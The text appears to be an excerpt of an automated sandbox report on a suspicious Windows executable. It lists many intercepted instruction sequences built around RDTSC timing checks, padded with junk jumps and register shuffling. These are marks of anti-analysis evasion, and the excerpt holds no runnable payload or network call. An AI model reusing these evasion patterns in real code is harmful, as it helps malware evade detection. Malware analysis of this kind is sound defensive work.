Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0624 second address: 4EA0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0649 second address: 4EA0707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 xor al, 0000007Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push esi 0x0000001a mov eax, edi 0x0000001c pop edi 0x0000001d mov di, si 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F0E948C9FBAh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov bx, 06C0h 0x0000002e popad 0x0000002f push ecx 0x00000030 jmp 00007F0E948C9FC4h 0x00000035 mov dword ptr [esp], ecx 0x00000038 pushad 0x00000039 movzx esi, di 0x0000003c pushfd 0x0000003d jmp 00007F0E948C9FC3h 0x00000042 adc cx, 1D4Eh 0x00000047 jmp 00007F0E948C9FC9h 0x0000004c popfd 0x0000004d popad 0x0000004e mov eax, dword ptr [76FA65FCh] 0x00000053 pushad 0x00000054 call 00007F0E948C9FBCh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0707 second address: 4EA077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0E94F51A51h 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007F0E94F51A4Eh 0x00000012 je 00007F0F06FD4C7Eh 0x00000018 pushad 0x00000019 jmp 00007F0E94F51A4Eh 0x0000001e pushad 0x0000001f mov dx, cx 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 popad 0x00000027 mov ecx, eax 0x00000029 pushad 0x0000002a pushad 0x0000002b mov cx, di 0x0000002e jmp 00007F0E94F51A57h 0x00000033 popad 0x00000034 mov si, 95EFh 0x00000038 popad 0x00000039 xor eax, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push ecx 0x00000040 pop ebx 0x00000041 mov ah, D8h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA077B second address: 4EA0842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d mov dl, ah 0x0000000f pushfd 0x00000010 jmp 00007F0E948C9FC3h 0x00000015 jmp 00007F0E948C9FC3h 0x0000001a popfd 0x0000001b popad 0x0000001c ror eax, cl 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E948C9FC4h 0x00000025 add esi, 5147D008h 0x0000002b jmp 00007F0E948C9FBBh 0x00000030 popfd 0x00000031 jmp 00007F0E948C9FC8h 0x00000036 popad 0x00000037 leave 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F0E948C9FBEh 0x0000003f add esi, 5754C598h 0x00000045 jmp 00007F0E948C9FBBh 0x0000004a popfd 0x0000004b mov dx, si 0x0000004e popad 0x0000004f retn 0004h 0x00000052 nop 0x00000053 mov esi, eax 0x00000055 lea eax, dword ptr [ebp-08h] 0x00000058 xor esi, dword ptr [00AB2014h] 0x0000005e push eax 0x0000005f push eax 0x00000060 push eax 0x00000061 lea eax, dword ptr [ebp-10h] 0x00000064 push eax 0x00000065 call 00007F0E98CFA7F3h 0x0000006a push FFFFFFFEh 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F0E948C9FC1h 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0842 second address: 4EA0867 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E94F51A4Dh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0867 second address: 4EA0886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ret 0x0000000b nop 0x0000000c push eax 0x0000000d call 00007F0E98CFA831h 0x00000012 mov edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0E948C9FC0h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0886 second address: 4EA0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA0898 second address: 4EA089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EA089C second address: 4EA08BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E94F51A53h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5002E second address: 4E500AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E948C9FBFh 0x00000009 and ch, 0000000Eh 0x0000000c jmp 00007F0E948C9FC9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC0h 0x00000018 sub ax, 1388h 0x0000001d jmp 00007F0E948C9FBBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ch, bh 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F0E948C9FBAh 0x00000036 jmp 00007F0E948C9FC5h 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E500AE second address: 4E5013B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 6E5055D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007F0E94F51A58h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 movsx ebx, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dx, ax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 and ax, 2DD8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 jmp 00007F0E94F51A58h 0x00000035 popad 0x00000036 popad 0x00000037 and esp, FFFFFFF8h 0x0000003a jmp 00007F0E94F51A50h 0x0000003f xchg eax, ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov edi, 0C56B380h 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5013B second address: 4E50141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50141 second address: 4E50145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50145 second address: 4E50162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 push edi 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50162 second address: 4E50168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50168 second address: 4E5016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5016C second address: 4E5017B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5017B second address: 4E50181 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50181 second address: 4E501DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F0E94F51A50h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F0E94F51A57h 0x00000019 add ecx, 2B0072CEh 0x0000001f jmp 00007F0E94F51A59h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501DE second address: 4E501FD instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E948C9FC0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E501FD second address: 4E50203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50203 second address: 4E5023D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC1h 0x00000014 or ax, 1F16h 0x00000019 jmp 00007F0E948C9FC1h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5037C second address: 4E50383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50383 second address: 4E503FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 408Bh 0x00000007 mov edx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 pushfd 0x00000013 jmp 00007F0E948C9FC5h 0x00000018 sbb si, 6786h 0x0000001d jmp 00007F0E948C9FC1h 0x00000022 popfd 0x00000023 popad 0x00000024 je 00007F0F06998208h 0x0000002a jmp 00007F0E948C9FBEh 0x0000002f cmp dword ptr [esi+08h], DDEEDDEEh 0x00000036 jmp 00007F0E948C9FC0h 0x0000003b je 00007F0F069981F3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FA second address: 4E503FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E503FE second address: 4E50404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50404 second address: 4E5044E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F0E94F51A50h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F0E94F51A50h 0x00000019 test edx, 61000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E5044E second address: 4E50452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50452 second address: 4E50458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408B1 second address: 4E408EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F0E948C9FC4h 0x00000014 jmp 00007F0E948C9FC5h 0x00000019 popfd 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E408EA second address: 4E40939 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0E94F51A50h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov bx, 8E66h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F0E94F51A4Ch 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F0E94F51A4Dh 0x0000001f add ch, FFFFFFC6h 0x00000022 jmp 00007F0E94F51A51h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40939 second address: 4E4094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 movsx edx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E4094D second address: 4E40960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40AE2 second address: 4E40B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F0E948C9FBEh 0x00000010 je 00007F0F0699F84Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0E948C9FC7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B2E second address: 4E40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [76FA6968h], 00000002h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F0E94F51A4Ch 0x00000017 sbb ch, FFFFFFD8h 0x0000001a jmp 00007F0E94F51A4Bh 0x0000001f popfd 0x00000020 mov edi, eax 0x00000022 popad 0x00000023 jne 00007F0F0702728Ah 0x00000029 pushad 0x0000002a push esi 0x0000002b mov bl, 80h 0x0000002d pop esi 0x0000002e popad 0x0000002f mov edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F0E94F51A4Bh 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b movsx edx, ax 0x0000003e push ecx 0x0000003f pop edx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B96 second address: 4E40B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40B9C second address: 4E40BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAB second address: 4E40BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BAF second address: 4E40BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40BC2 second address: 4E40BF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dx, CFBEh 0x00000011 jmp 00007F0E948C9FBFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40CF9 second address: 4E40D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D09 second address: 4E40D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D0D second address: 4E40D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F0E94F51A57h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D34 second address: 4E40D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D38 second address: 4E40D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D53 second address: 4E40D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D59 second address: 4E40D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D5D second address: 4E40D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40D61 second address: 4E40DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A58h 0x00000013 xor si, 3548h 0x00000018 jmp 00007F0E94F51A4Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0E94F51A58h 0x00000024 sbb esi, 649DF7A8h 0x0000002a jmp 00007F0E94F51A4Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DC4 second address: 4E40DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCA second address: 4E40DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E40DCE second address: 4E40DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movsx edi, cx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD1 second address: 4E50DD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DD7 second address: 4E50DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DF7 second address: 4E50DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50DFB second address: 4E50E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E01 second address: 4E50E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0E94F51A58h 0x00000008 pop ecx 0x00000009 jmp 00007F0E94F51A4Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0E94F51A59h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0E94F51A4Eh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 mov bl, D6h 0x00000023 pop ecx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E5E second address: 4E50E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, dh 0x00000006 popad 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E6C second address: 4E50E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 44D57068h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50E76 second address: 4E50E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B4E second address: 4E50B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B60 second address: 4E50B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B64 second address: 4E50B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F0E94F51A4Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 push esi 0x00000013 push edi 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 mov al, D3h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0E94F51A53h 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E50B9D second address: 4E50BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0289 second address: 4EC02A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A2 second address: 4EC02A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02A8 second address: 4EC02AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02AC second address: 4EC02B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
